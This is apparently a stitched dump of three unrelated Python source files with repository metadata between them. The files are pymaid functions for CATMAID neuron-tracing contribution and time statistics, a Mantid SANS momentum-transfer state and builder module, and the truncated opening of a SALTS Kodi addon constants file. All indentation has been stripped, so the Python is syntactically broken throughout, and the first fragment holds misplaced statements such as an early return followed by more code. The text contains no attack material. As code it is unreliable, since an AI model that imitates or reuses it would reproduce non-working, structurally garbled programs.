# Extract edition times (treenodes + connectors)
node_edits = node_details.loc[:, ['editor', 'edition_time']].values
node_edits = np.c_[node_edits, ['editor'] * node_edits.shape[0]]
# Link creation
link_creation = link_details.loc[link_details.connector_id.isin(cn_ids),
['creator', 'creation_time']].values
link_creation = np.c_[link_creation, ['link_creation'] * link_creation.shape[0]]
# Extract review times
reviewers = [u for l in node_details.reviewers.values for u in l]
timestamps = [ts for l in node_details.review_times.values for ts in l]
node_review = np.c_[reviewers, timestamps, ['review'] * len(reviewers)]
# Merge all timestamps (ignore edits for now) to get time_invested
all_ts = pd.DataFrame(np.vstack([node_creation,
node_review,
cn_creation,
link_creation,
node_edits]),
columns=['user', 'timestamp', 'type'])
return all_ts
# Add column with just the date and make it the index
all_ts['date'] = all_ts.timestamp.values.astype('datetime64[D]')
all_ts.index = pd.to_datetime(all_ts.date)
# Fill in teams for each timestamp based on user + date
all_ts['team'] = None
for t in teams:
for u in teams[t]:
# Assign all timestamps by this user in the right time to
# this team
existing_dates = (teams[t][u] & all_ts.index).unique()
ss = (all_ts.index.isin(existing_dates)) & (all_ts.user.values == user_list.loc[u, 'id'])
all_ts.loc[ss, 'team'] = t
# Get total
total_time = sum(all_ts.timestamp.to_frame().set_index(
'timestamp', drop=False).groupby(pd.Grouper(freq=bin_width)).count().values >= minimum_actions)[0] * interval
this_neuron = [n.skeleton_id, n.n_nodes, n.n_connectors,
node_review.shape[0], total_time]
# Go over the teams and collect values
for t in teams:
# Subset to team
this_team = all_ts[all_ts.team == t]
if this_team.shape[0] > 0:
# Subset to user ID
team_time = sum(this_team.timestamp.to_frame().set_index(
'timestamp', drop=False).groupby(pd.Grouper(freq=bin_width)).count().values >= minimum_actions)[0] * interval
team_nodes = this_team[this_team['type'] == 'node_creation'].shape[0]
team_cn = this_team[this_team['type'] == 'cn_creation'].shape[0]
team_rev = this_team[this_team['type'] == 'review'].shape[0]
else:
team_nodes = team_cn = team_rev = team_time = 0
this_neuron += [team_nodes, team_cn, team_rev, team_time]
stats.append(this_neuron)
cols = ['skeleton_id', 'total_nodes', 'total_connectors',
'total_reviews', 'total_time']
for t in teams:
for s in ['nodes', 'connectors', 'reviews', 'time']:
cols += ['{}_{}'.format(t, s)]
stats = pd.DataFrame(stats, columns=cols)
cols_ordered = ['skeleton_id'] + ['{}_{}'.format(t, v) for v in
['nodes', 'connectors',
'reviews', 'time'] for t in ['total'] + list(teams)]
stats = stats[cols_ordered]
return stats
def get_user_contributions(x, teams=None, remote_instance=None):
"""Return number of nodes and synapses contributed by each user.
This is essentially a wrapper for :func:`pymaid.get_contributor_statistics`
- if you are also interested in e.g. construction time, review time, etc.
you may want to consider using :func:`~pymaid.get_contributor_statistics`
instead.
Parameters
----------
x
Which neurons to check. Can be either:
1. skeleton IDs (int or str)
2. neuron name (str, must be exact match)
3. annotation: e.g. 'annotation:PN right'
4. CatmaidNeuron or CatmaidNeuronList object
teams dict, optional
Teams to group contributions for. Users must be logins::
{'teamA': ['user1', 'user2'], 'team2': ['user3'], ...]}
Users not part of any team, will be grouped as team
``'others'``.
remote_instance : CatmaidInstance, optional
Either pass explicitly or define globally.
Returns
-------
pandas.DataFrame
DataFrame in which each row represents a user::
user nodes presynapses postsynapses nodes_reviewed
0
1
...
Examples
--------
>>> import matplotlib.pyplot as plt
>>> # Get contributors for a single neuron
>>> cont = pymaid.get_user_contributions(2333007)
>>> # Get top 10 (by node contribution)
>>> top10 = cont.iloc[:10].set_index('user')
>>> # Plot as bar chart
>>> ax = top10.plot(kind='bar')
>>> plt.show()
>>> # Plot relative contributions
>>> cont = pymaid.get_user_contributions(2333007)
>>> cont = cont.set_index('user')
>>> # Normalize
>>> cont_rel = cont / cont.sum(axis=0).values
>>> # Plot contributors with >5% node contributions
>>> ax = cont_rel[cont_rel.nodes > .05].plot(kind='bar')
>>> plt.show()
See Also
--------
:func:`~pymaid.get_contributor_statistics`
Gives you more basic info on neurons of interest
such as total reconstruction/review time.
"""
if not isinstance(teams, type(None)):
# Prepare teams
if not isinstance(teams, dict):
raise TypeError('Expected teams of type dict, got '
'{}'.format(type(teams)))
for t in teams:
if not isinstance(teams[t], list):
raise TypeError('Teams need to list of user logins, '
'got {}'.format(type(teams[t])))
# Turn teams into a login -> team dict
teams = {u: t for t in teams for u in teams[t]}
remote_instance = utils._eval_remote_instance(remote_instance)
skids = utils.eval_skids(x, remote_instance=remote_instance)
cont = fetch.get_contributor_statistics(skids,
remote_instance=remote_instance,
separate=False)
all_users = set(list(cont.node_contributors.keys()) + list(cont.pre_contributors.keys()) + list(cont.post_contributors.keys()))
stats = {
'nodes': {u: 0 for u in all_users},
'presynapses': {u: 0 for u in all_users},
'postsynapses': {u: 0 for u in all_users},
'nodes_reviewed': {u: 0 for u in all_users}
}
for u in cont.node_contributors:
stats['nodes'][u] = cont.node_contributors[u]
for u in cont.pre_contributors:
stats['presynapses'][u] = cont.pre_contributors[u]
for u in cont.post_contributors:
stats['postsynapses'][u] = cont.post_contributors[u]
for u in cont.review_contributors:
stats['nodes_reviewed'][u] = cont.review_contributors[u]
stats = pd.DataFrame([[u, stats['nodes'][u],
stats['presynapses'][u],
stats['postsynapses'][u],
stats['nodes_reviewed'][u]] for u in all_users],
columns=['user', 'nodes', 'presynapses',
'postsynapses', 'nodes_reviewed']
).sort_values('nodes', ascending=False).reset_index(drop=True)
if isinstance(teams, type(None)):
return stats
stats['team'] = [teams.get(u, 'others') for u in stats.user.values]
return stats.groupby('team').sum()
def get_time_invested(x, mode='SUM', by='USER', minimum_actions=10,
max_inactive_time=3, treenodes=True, connectors=True,
links=True, start_date=None, end_date=None,
remote_instance=None):
"""Calculate the time spent working on a set of neurons.
Use ``minimum_actions`` and ``max_inactive_time`` to fine tune how time
invested is calculated: by default, time is binned over 3 minutes in
which a user has to perform 3x10 actions for that interval to be
counted towards the time spent tracing.
Important
---------
Creation/Edition/Review times can overlap! This is why total time spent
is not just creation + edition + review.
Please note that this does currently not take placement of
pre-/postsynaptic nodes into account!
Be aware of the ``minimum_actions`` parameter: at low values even
a single action (e.g. connecting a node) will add considerably to time
invested. To keep total reconstruction time comparable to what Catmaid
calculates, you should consider about 10 actions/minute (= a click every
6 seconds) and ``max_inactive_time`` of 3 mins.
CATMAID gives reconstruction time across all users. Here, we calculate
the time spent tracing for individuals. This may lead to a discrepancy
between sum of time invested over of all users from this function vs.
CATMAID's reconstruction time.
Parameters
----------
x
Which neurons to check. Can be either:
1. skeleton IDs (int or str)
2. neuron name (str, must be exact match)
3. annotation: e.g. 'annotation:PN right'
4. CatmaidNeuron or CatmaidNeuronList object
If you pass a CatmaidNeuron/List, its node/connectors
are used to calculate time invested. You can exploit
this to get time spent reconstructing in given
compartment of a neurons, e.g. by pruning it to a
volume before passing it to ``get_time_invested``.
mode : 'SUM' | 'SUM2' | 'OVER_TIME' | 'ACTIONS', optional
(1) 'SUM' will return total time invested (in minutes)
broken down by creation, edition and review.
(2) 'SUM2' will return total time invested (in
minutes) broken down by `treenodes`, `connectors`
and `links`.
(3) 'OVER_TIME' will return minutes invested/day over
time.
(4) 'ACTIONS' will return actions
(node/connectors placed/edited) per day.
by : 'USER' | 'NEURON', optional
Determines whether the stats are broken down by user or
by neuron.
minimum_actions : int, optional
Minimum number of actions per minute to be counted as
active.
max_inactive_time : int, optional
Interval in minutes over which time invested is
binned. Essentially determines how much time can be
between bouts of activity.
treenodes : bool, optional
If False, treenodes will not be taken into account.
connectors : bool, optional
If False, connectors will not be taken into account.
links : bool, optional
If False, connector links will not be taken into account.
start_date : iterable | datetime.date | numpy.datetime64, optional
Restricts time invested to window. Applies to creation
but not edition time! If iterable, must be year, month
day, e.g. ``[2018, 1, 1]``.
end_date : iterable | datetime.date | numpy.datetime64, optional
See ``start_date``.
remote_instance : CatmaidInstance, optional
Either pass explicitly or define globally.
Returns
-------
pandas.DataFrame
If ``mode='SUM'``, values represent minutes invested::
total creation edition review
user1
user2
..
.
If ``mode='SUM2'``, values represent minutes invested::
total treenodes connectors links
user1
user2
..
.
If ``mode='OVER_TIME'`` or ``mode='ACTIONS'``::
date1 date2 date3 ...
user1
user2
..
.
For `OVER_TIME`, values respresent minutes invested on that day. For
`ACTIONS`, values represent actions (creation, edition, review) on that
day.
Examples
--------
Get time invested for a set of neurons:
>>> da1 = pymaid.get_neurons('annotation:glomerulus DA1')
>>> time = pymaid.get_time_invested(da1)
Get time spent tracing in a specific compartment:
>>> da1_lh = pymaid.prune_by_volume('LH_R', inplace=False)
>>> time_lh = pymaid.get_time_invested(da1_lh)
Get contributions within a given time window:
>>> time_jan = pymaid.get_time_invested(da1,
... start_date=[2018, 1, 1],
... end_date=[2018, 1, 31])
Plot pie chart of contributions per user using Plotly:
>>> import plotly
>>> stats = pymaid.get_time_invested(skids, remote_instance)
>>> # Use plotly to generate pie chart
>>> fig = {"data": [{"values": stats.total.tolist(),
... "labels": stats.user.tolist(), "type" : "pie" }]}
>>> plotly.offline.plot(fig)
Plot reconstruction efforts over time:
>>> stats = pymaid.get_time_invested(skids, mode='OVER_TIME')
>>> # Plot time invested over time
>>> stats.T.plot()
>>> # Plot cumulative time invested over time
>>> stats.T.cumsum(axis=0).plot()
>>> # Filter for major contributors
>>> stats[stats.sum(axis=1) > 20].T.cumsum(axis=0).plot()
"""
def _extract_timestamps(ts, restrict_groups, desc='Calc'):
if ts.empty:
return {}
grouped = ts.set_index('timestamp',
drop=False).groupby(['group',
pd.Grouper(freq=bin_width)]).count() >= minimum_actions
temp_stats = {}
for g in config.tqdm(set(ts.group.unique()) & set(restrict_groups),
desc=desc, disable=config.pbar_hide, leave=False):
temp_stats[g] = sum(grouped.loc[g].values)[0] * interval
return temp_stats
if mode not in ['SUM', 'SUM2', 'OVER_TIME', 'ACTIONS']:
raise ValueError('Unknown mode "{}"'.format(mode))
if by not in ['NEURON', 'USER']:
raise ValueError('Unknown by "{}"'.format(by))
remote_instance = utils._eval_remote_instance(remote_instance)
skids = utils.eval_skids(x, remote_instance=remote_instance)
# Maximal inactive time is simply translated into binning
# We need this later for pandas.TimeGrouper() anyway
interval = max_inactive_time
bin_width = '%iMin' % interval
# Update minimum_actions to reflect actions/interval instead of
# actions/minute
minimum_actions *= interval
user_list = fetch.get_user_list(remote_instance=remote_instance).set_index('id')
user_dict = user_list.login.to_dict()
if not isinstance(x, (core.CatmaidNeuron, core.CatmaidNeuronList)):
x = fetch.get_neuron(skids, remote_instance=remote_instance)
if isinstance(x, core.CatmaidNeuron):
skdata = core.CatmaidNeuronList(x)
elif isinstance(x, core.CatmaidNeuronList):
skdata = x
if not isinstance(end_date, (datetime.date, np.datetime64, type(None))):
end_date = datetime.date(*end_date)
if not isinstance(start_date, (datetime.date, np.datetime64, type(None))):
start_date = datetime.date(*start_date)
# Extract connector and node IDs
node_ids = []
connector_ids = []
for n in skdata.itertuples():
if treenodes:
node_ids += n.nodes.node_id.tolist()
if connectors:
connector_ids += n.connectors.connector_id.tolist()
# Get node details
node_details = fetch.get_node_details(node_ids + connector_ids,
remote_instance=remote_instance)
# Get details for links
if links:
link_details = fetch.get_connector_links(skdata,
remote_instance=remote_instance)
# link_details contains all links. We have to subset this to existing
# connectors in case the input neurons have been pruned
link_details = link_details[link_details.connector_id.isin(connector_ids)]
else:
link_details = pd.DataFrame([], columns=['creator', 'creation_time'])
# Remove timestamps outside of date range (if provided)
if start_date:
node_details = node_details[node_details.creation_time >= np.datetime64(start_date)]
link_details = link_details[link_details.creation_time >= np.datetime64(start_date)]
if end_date:
node_details = node_details[node_details.creation_time <= np.datetime64(end_date)]
link_details = link_details[link_details.creation_time <= np.datetime64(end_date)]
# If we want to group by neuron, we need to add a "skeleton ID" column and
# make check if we need to duplicate rows with connectors
if by == 'NEURON':
# Need to add a column with the skeleton ID
node_details['skeleton_id'] = None
node_details['node_type'] = 'connector'
col_name = 'skeleton_id'
for n in skdata:
cond = node_details.node_id.isin(n.nodes.node_id.values.astype(str))
node_details.loc[cond, 'skeleton_id'] = n.skeleton_id
node_details.loc[cond, 'node_type'] = 'treenode'
# Connectors can show up in more than one neuron -> we need to duplicate
# those rows for each of the associated neurons
cn_details = []
for n in skdata:
cond1 = node_details.node_type == 'connector'
cond2 = node_details.node_id.isin(n.connectors.connector_id.values.astype(str))
node_details.loc[cond1 & cond2, 'skeleton_id'] = n.skeleton_id
this_cn = node_details.loc[cond1 & cond2]
cn_details.append(this_cn)
cn_details = pd.concat(cn_details, axis=0)
# Merge the node details again
cond1 = node_details.node_type == 'treenode'
node_details = pd.concat([node_details.loc[cond1], cn_details],
axis=0).reset_index(drop=True)
# Note that link_details already has a "skeleton_id" column
# but we need to make sure it's strings
link_details['skeleton_id'] = link_details.skeleton_id.astype(str)
create_group = edit_group = 'skeleton_id'
else:
create_group = 'creator'
edit_group = 'editor'
col_name = 'user'
# Dataframe for creation (i.e. the actual generation of the nodes)
creation_timestamps = np.append(node_details[[create_group,
'creation_time']].values,
link_details[[create_group,
'creation_time']].values,
axis=0)
creation_timestamps = pd.DataFrame(creation_timestamps,
columns=['group', 'timestamp'])
# Dataframe for edition times - can't use links as there is no editor
# Because creation of a node counts as an edit, we are removing
# timestamps where creation and edition time are less than 100ms apart
is_edit = (node_details.edition_time - node_details.creation_time) > np.timedelta64(200, 'ms')
edition_timestamps = node_details.loc[is_edit, [edit_group, 'edition_time']]
edition_timestamps.columns = ['group', 'timestamp']
# Generate dataframe for reviews -> here we have to unpack
if by == 'USER':
groups = [u for l in node_details.reviewers.values for u in l]
else:
groups = [s for l, s in zip(node_details.review_times.values,
node_details.skeleton_id.values) for ts in l]
timestamps = [ts for l in node_details.review_times.values for ts in l]
review_timestamps = pd.DataFrame([groups, timestamps]).T
review_timestamps.columns = ['group', 'timestamp']
# Change user ID to login
if by == 'USER':
if mode == 'SUM2':
node_details['creator'] = node_details.creator.map(user_dict)
node_details['editor'] = node_details.editor.map(user_dict)
link_details['creator'] = link_details.creator.map(user_dict)
creation_timestamps['group'] = creation_timestamps.group.map(user_dict)
edition_timestamps['group'] = edition_timestamps.group.map(user_dict)
review_timestamps['group'] = review_timestamps.group.map(user_dict)
# Merge all timestamps
all_timestamps = pd.concat([creation_timestamps,
edition_timestamps,
review_timestamps],
axis=0)
all_timestamps.sort_values('timestamp', inplace=True)
if by == 'USER':
# Extract the users that are relevant for us
relevant_users = all_timestamps.groupby('group').count()
groups = relevant_users[relevant_users.timestamp >= minimum_actions].index.values
else:
groups = skdata.skeleton_id
if mode == 'SUM':
# This breaks it down by time spent on creation, edition and review
stats = {k: {g: 0 for g in groups} for k in ['total',
'creation',
'edition',
'review']}
stats['total'].update(_extract_timestamps(all_timestamps,
groups,
desc='Calc total'))
stats['creation'].update(_extract_timestamps(creation_timestamps,
groups,
desc='Calc creation'))
stats['edition'].update(_extract_timestamps(edition_timestamps,
groups,
desc='Calc edition'))
stats['review'].update(_extract_timestamps(review_timestamps,
groups,
desc='Calc review'))
return pd.DataFrame([[g,
stats['total'][g],
stats['creation'][g],
stats['edition'][g],
stats['review'][g]] for g in groups],
columns=[col_name, 'total',
'creation', 'edition',
'review']
).sort_values('total',
ascending=False
).reset_index(drop=True).set_index(col_name)
elif mode == 'SUM2':
# This breaks it down by time spent on nodes, connectors and links
stats = {k: {g: 0 for g in groups} for k in ['total',
'treenodes',
'connectors',
'links']}
stats['total'].update(_extract_timestamps(all_timestamps,
groups,
desc='Calc total'))
# We need to construct separate DataFrames for nodes, connectors + links
# Note that we are using only edits that do not stem from the creation
is_tn = node_details.node_id.astype(int).isin(node_ids)
conc = np.concatenate([node_details.loc[is_tn,
[create_group, 'creation_time']
].values,
node_details.loc[is_edit & is_tn,
[edit_group, 'edition_time']
].values
],
axis=0)
treenode_timestamps = pd.DataFrame(conc, columns=['group', 'timestamp'])
stats['treenodes'].update(_extract_timestamps(treenode_timestamps,
groups,
desc='Calc treenodes'))
# Now connectors
# Note that we are using only edits that do not stem from the creation
is_cn = node_details.node_id.astype(int).isin(connector_ids)
conc = np.concatenate([node_details.loc[is_cn,
[create_group, 'creation_time']
].values,
node_details.loc[is_edit & is_cn,
[edit_group, 'edition_time']
].values
],
axis=0)
connector_timestamps = pd.DataFrame(conc, columns=['group', 'timestamp'])
stats['connectors'].update(_extract_timestamps(connector_timestamps,
groups,
desc='Calc connectors'))
# Now links
link_timestamps = pd.DataFrame(link_details[[create_group,
'creation_time']].values,
columns=['group', 'timestamp'])
stats['links'].update(_extract_timestamps(link_timestamps,
groups,
desc='Calc links'))
return pd.DataFrame([[g,
stats['total'][g],
stats['treenodes'][g],
stats['connectors'][g],
stats['links'][g]] for g in groups],
columns=[col_name, 'total',
'treenodes', 'connectors',
'links']
).sort_values('total', ascending=False
).reset_index(drop=True
).set_index(col_name)
elif mode == 'ACTIONS':
all_ts = all_timestamps.set_index('timestamp', drop=False
).timestamp.groupby(pd.Grouper(freq='1d')
).count().to_frame()
all_ts.columns = ['all_groups']
all_ts = all_ts.T
# Get total time spent
for g in config.tqdm(all_timestamps.group.unique(), desc='Calc. total',
disable=config.pbar_hide, leave=False):
this_ts = all_timestamps[all_timestamps.group == g].set_index(
'timestamp', drop=False).timestamp.groupby(pd.Grouper(freq='1d')).count().to_frame()
this_ts.columns = [g]
all_ts = pd.concat([all_ts, this_ts.T])
return all_ts.fillna(0)
elif mode == 'OVER_TIME':
# Go over all users and collect time invested
all_ts = []
for g in config.tqdm(all_timestamps.group.unique(), desc='Calc. total', disable=config.pbar_hide, leave=False):
# First count all minutes with minimum number of actions
minutes_counting = (all_timestamps[all_timestamps.group == g].set_index(
'timestamp', drop=False).timestamp.groupby(pd.Grouper(freq=bin_width)).count().to_frame() >= minimum_actions)
# Then remove the minutes that have less than minimum actions
minutes_counting = minutes_counting[minutes_counting.timestamp]
# Now group timestamps by day
this_ts = minutes_counting.groupby(pd.Grouper(freq='1d')).count()
# Rename columns to user login
this_ts.columns = [g]
# Append if an and move on
if not this_ts.empty:
all_ts.append(this_ts.T)
# Turn into DataFrame
all_ts = pd.concat(all_ts).sort_index()
# Replace NaNs with 0
all_ts.fillna(0, inplace=True)
# Add all users column
all_users = all_ts.sum(axis=0)
all_users.name = 'all_groups'
all_ts = pd.concat([all_users, all_ts.T], axis=1).T
return all_ts
def get_user_actions(users=None, neurons=None, start_date=None, end_date=None,
remote_instance=None):
"""Get timestamps of user actions (creations, editions, reviews, linking).
Important
---------
This function returns most but not all user actions::
1. The API endpoint used for finding neurons worked on by a given user
(:func:`pymaid.find_neurons`) does not return single-node neurons.
Hence, placing e.g. postsynaptic nodes is not taken into account.
2. Any creation is also an edit. However, only the last edit is kept
track of. So each creation counts as an edit for the creator until a
different user makes an edit.
Parameters
----------
users : str | list, optional
Users login(s) for which to return timestamps.
neurons : list of skeleton IDs | CatmaidNeuron/List, optional
Neurons for which to return timestamps. If None, will
find neurons by user.
start_date : tuple | datetime.date, optional
end_date : tuple | datetime.date, optional
Start and end date of time window to check.
remote_instance : CatmaidInstance, optional
Return
------
pandas.DataFrame
DataFrame in which each row is a user action::
user timestamp action
0
1
...
Examples
--------
In the first example we will have a look at how active a user is over
the course of a day.
>>> import pandas as pd
>>> import matplotlib.pyplot as plt
>>> # Get all actions for a single user
>>> actions = pymaid.get_user_actions(users='schlegelp',
.... start_date=(2017, 11, 1))
>>> # Group by hour and see what time of the day user is usually active
>>> actions.set_index(pd.DatetimeIndex(actions.timestamp), inplace=True)
>>> hours = actions.groupby(actions.index.hour).count()
>>> ax = hours.action.plot()
>>> plt.show()
>>> # Plot day-by-day activity
>>> ax = plt.subplot()
>>> ax.scatter(actions.timestamp.date.values,
... actions.timestamp.time.values,
... marker='_')
"""
if not neurons and not users and not (start_date or end_date):
raise ValueError('Query must be restricted by at least a single '
'parameter!')
if users and not isinstance(users, (list, np.ndarray)):
users = [users]
# Get user dictionary (needed later)
user_list = fetch.get_user_list(remote_instance=remote_instance)
user_dict = user_list.set_index('id').login.to_dict()
if isinstance(neurons, type(None)):
neurons = fetch.find_neurons(users=users,
from_date=start_date, to_date=end_date,
reviewed_by=users,
remote_instance=remote_instance)
# Get skeletons
neurons.get_skeletons()
elif not isinstance(neurons, (core.CatmaidNeuron, core.CatmaidNeuronList)):
neurons = fetch.get_neuron(neurons, remote_instance=remote_instance)
if not isinstance(end_date, (datetime.date, type(None))):
end_date = datetime.date(*end_date)
if not isinstance(start_date, (datetime.date, type(None))):
start_date = datetime.date(*start_date)
node_ids = neurons.nodes.node_id.tolist()
connector_ids = neurons.connectors.connector_id.tolist()
# Get node details
node_details = fetch.get_node_details(node_ids + connector_ids,
remote_instance=remote_instance)
# Get details for links
link_details = fetch.get_connector_links(neurons,
remote_instance=remote_instance)
# Dataframe for creation (i.e. the actual generation of the nodes)
creation_timestamps = node_details[['creator', 'creation_time']].copy()
creation_timestamps['action'] = 'creation'
creation_timestamps.columns = ['user', 'timestamp', 'action']
# Dataframe for edition times
edition_timestamps = node_details[['editor', 'edition_time']].copy()
edition_timestamps['action'] = 'edition'
edition_timestamps.columns = ['user', 'timestamp', 'action']
# DataFrame for linking
linking_timestamps = link_details[['creator', 'creation_time']].copy()
linking_timestamps['action'] = 'linking'
linking_timestamps.columns = ['user', 'timestamp', 'action']
# Generate dataframe for reviews
reviewers = [u for l in node_details.reviewers.tolist() for u in l]
timestamps = [ts for l in node_details.review_times.tolist() for ts in l]
review_timestamps = pd.DataFrame([[u, ts, 'review'] for u, ts in zip(
reviewers, timestamps)], columns=['user', 'timestamp', 'action'])
# Merge all timestamps
all_timestamps = pd.concat([creation_timestamps,
edition_timestamps,
review_timestamps,
linking_timestamps],
axis=0).reset_index(drop=True)
# Map login onto user ID
all_timestamps.user = [user_dict[u] for u in all_timestamps.user.values]
# Remove other users
all_timestamps = all_timestamps[all_timestamps.user.isin(users)]
# Remove timestamps outside of date range (if provided)
if start_date:
all_timestamps = all_timestamps[all_timestamps.timestamp.values >= np.datetime64(start_date)]
if end_date:
all_timestamps = all_timestamps[all_timestamps.timestamp.values <= np.datetime64(end_date)]
return all_timestamps.sort_values('timestamp').reset_index(drop=True)
|
gpl-3.0
| 476,608,047,681,674,560
| 41.385082
| 131
| 0.538347
| false
| 4.267004
| false
| false
| false
|
mganeva/mantid
|
scripts/SANS/sans/state/convert_to_q.py
|
1
|
10526
|
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
# pylint: disable=too-few-public-methods
"""State describing the conversion to momentum transfer"""
from __future__ import (absolute_import, division, print_function)
import json
import copy
from sans.state.state_base import (StateBase, rename_descriptor_names, BoolParameter, PositiveFloatParameter,
ClassTypeParameter, StringParameter)
from sans.common.enums import (ReductionDimensionality, RangeStepType, SANSFacility)
from sans.state.state_functions import (is_pure_none_or_not_none, is_not_none_and_first_larger_than_second,
validation_message)
from sans.state.automatic_setters import (automatic_setters)
# ----------------------------------------------------------------------------------------------------------------------
# State
# ----------------------------------------------------------------------------------------------------------------------
@rename_descriptor_names
class StateConvertToQ(StateBase):
reduction_dimensionality = ClassTypeParameter(ReductionDimensionality)
use_gravity = BoolParameter()
gravity_extra_length = PositiveFloatParameter()
radius_cutoff = PositiveFloatParameter()
wavelength_cutoff = PositiveFloatParameter()
# 1D settings
q_min = PositiveFloatParameter()
q_max = PositiveFloatParameter()
q_1d_rebin_string = StringParameter()
# 2D settings
q_xy_max = PositiveFloatParameter()
q_xy_step = PositiveFloatParameter()
q_xy_step_type = ClassTypeParameter(RangeStepType)
# -----------------------
# Q Resolution specific
# ---------------------
use_q_resolution = BoolParameter()
q_resolution_collimation_length = PositiveFloatParameter()
q_resolution_delta_r = PositiveFloatParameter()
moderator_file = StringParameter()
# Circular aperture settings
q_resolution_a1 = PositiveFloatParameter()
q_resolution_a2 = PositiveFloatParameter()
# Rectangular aperture settings
q_resolution_h1 = PositiveFloatParameter()
q_resolution_h2 = PositiveFloatParameter()
q_resolution_w1 = PositiveFloatParameter()
q_resolution_w2 = PositiveFloatParameter()
def __init__(self):
super(StateConvertToQ, self).__init__()
self.reduction_dimensionality = ReductionDimensionality.OneDim
self.use_gravity = False
self.gravity_extra_length = 0.0
self.use_q_resolution = False
self.radius_cutoff = 0.0
self.wavelength_cutoff = 0.0
def validate(self):
is_invalid = {}
# 1D Q settings
if not is_pure_none_or_not_none([self.q_min, self.q_max]):
entry = validation_message("The q boundaries for the 1D reduction are inconsistent.",
"Make sure that both q boundaries are set (or none).",
{"q_min": self.q_min,
"q_max": self.q_max})
is_invalid.update(entry)
if is_not_none_and_first_larger_than_second([self.q_min, self.q_max]):
entry = validation_message("Incorrect q bounds for 1D reduction.",
"Make sure that the lower q bound is smaller than the upper q bound.",
{"q_min": self.q_min,
"q_max": self.q_max})
is_invalid.update(entry)
if self.reduction_dimensionality is ReductionDimensionality.OneDim:
if self.q_min is None or self.q_max is None:
entry = validation_message("Q bounds not set for 1D reduction.",
"Make sure to set the q boundaries when using a 1D reduction.",
{"q_min": self.q_min,
"q_max": self.q_max})
is_invalid.update(entry)
if self.q_1d_rebin_string is not None:
if self.q_1d_rebin_string == "":
entry = validation_message("Q rebin string does not seem to be valid.",
"Make sure to provide a valid rebin string",
{"q_1d_rebin_string": self.q_1d_rebin_string})
is_invalid.update(entry)
elif not is_valid_rebin_string(self.q_1d_rebin_string):
entry = validation_message("Q rebin string does not seem to be valid.",
"Make sure to provide a valid rebin string",
{"q_1d_rebin_string": self.q_1d_rebin_string})
is_invalid.update(entry)
# QXY settings
if self.reduction_dimensionality is ReductionDimensionality.TwoDim:
if self.q_xy_max is None or self.q_xy_step is None:
entry = validation_message("Q bounds not set for 2D reduction.",
"Make sure that the q_max value bound and the step for the 2D reduction.",
{"q_xy_max": self.q_xy_max,
"q_xy_step": self.q_xy_step})
is_invalid.update(entry)
# Q Resolution settings
if self.use_q_resolution:
if not is_pure_none_or_not_none([self.q_resolution_a1, self.q_resolution_a2]):
entry = validation_message("Inconsistent circular geometry.",
"Make sure that both diameters for the circular apertures are set.",
{"q_resolution_a1": self.q_resolution_a1,
"q_resolution_a2": self.q_resolution_a2})
is_invalid.update(entry)
if not is_pure_none_or_not_none([self.q_resolution_h1, self.q_resolution_h2, self.q_resolution_w1,
self.q_resolution_w2]):
entry = validation_message("Inconsistent rectangular geometry.",
"Make sure that both diameters for the circular apertures are set.",
{"q_resolution_h1": self.q_resolution_h1,
"q_resolution_h2": self.q_resolution_h2,
"q_resolution_w1": self.q_resolution_w1,
"q_resolution_w2": self.q_resolution_w2})
is_invalid.update(entry)
if all(element is None for element in [self.q_resolution_a1, self.q_resolution_a2, self.q_resolution_w1,
self.q_resolution_w2, self.q_resolution_h1, self.q_resolution_h2]):
entry = validation_message("Aperture is undefined.",
"Make sure that you set the geometry for a circular or a "
"rectangular aperture.",
{"q_resolution_a1": self.q_resolution_a1,
"q_resolution_a2": self.q_resolution_a2,
"q_resolution_h1": self.q_resolution_h1,
"q_resolution_h2": self.q_resolution_h2,
"q_resolution_w1": self.q_resolution_w1,
"q_resolution_w2": self.q_resolution_w2})
is_invalid.update(entry)
if self.moderator_file is None:
entry = validation_message("Missing moderator file.",
"Make sure to specify a moderator file when using q resolution.",
{"moderator_file": self.moderator_file})
is_invalid.update(entry)
is_invalid.update({"moderator_file": "A moderator file is required for the q resolution calculation."})
if is_invalid:
raise ValueError("StateMoveDetectorISIS: The provided inputs are illegal. "
"Please see: {0}".format(json.dumps(is_invalid)))
# ----------------------------------------------------------------------------------------------------------------------
# Builder
# ----------------------------------------------------------------------------------------------------------------------
class StateConvertToQBuilder(object):
@automatic_setters(StateConvertToQ)
def __init__(self):
super(StateConvertToQBuilder, self).__init__()
self.state = StateConvertToQ()
def build(self):
self.state.validate()
return copy.copy(self.state)
# ------------------------------------------
# Factory method for StateConvertToQBuilder
# ------------------------------------------
def get_convert_to_q_builder(data_info):
# The data state has most of the information that we require to define the q conversion.
# For the factory method, only the facility/instrument is of relevance.
facility = data_info.facility
if facility is SANSFacility.ISIS:
return StateConvertToQBuilder()
else:
raise NotImplementedError("StateConvertToQBuilder: Could not find any valid save builder for the "
"specified StateData object {0}".format(str(data_info)))
# -------------------------------------------
# Free functions
# -------------------------------------------
def is_valid_rebin_string(rebin_string):
is_valid = True
try:
values = [float(el) for el in rebin_string.split(",")]
if len(values) < 2:
is_valid = False
elif len(values) == 2:
if values[0] > values[1]:
is_valid = False
elif len(values) % 2 == 1: # odd number of entries
step_points = values[::2]
if not is_increasing(step_points):
is_valid = False
else:
is_valid = False
except: # noqa
is_valid = False
return is_valid
def is_increasing(step_points):
return all(el1 <= el2 for el1, el2 in zip(step_points, step_points[1:]))
|
gpl-3.0
| -7,986,338,881,087,957,000
| 48.650943
| 120
| 0.519286
| false
| 4.504065
| false
| false
| false
|
AMOboxTV/AMOBox.LegoBuild
|
plugin.video.salts/salts_lib/constants.py
|
1
|
7791
|
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
def __enum(**enums):
return type('Enum', (), enums)
MODES = __enum(
MAIN='main', BROWSE='browse', TRENDING='trending', RECOMMEND='recommend', CAL='calendar', MY_CAL='my_calendar', MY_LISTS='lists',
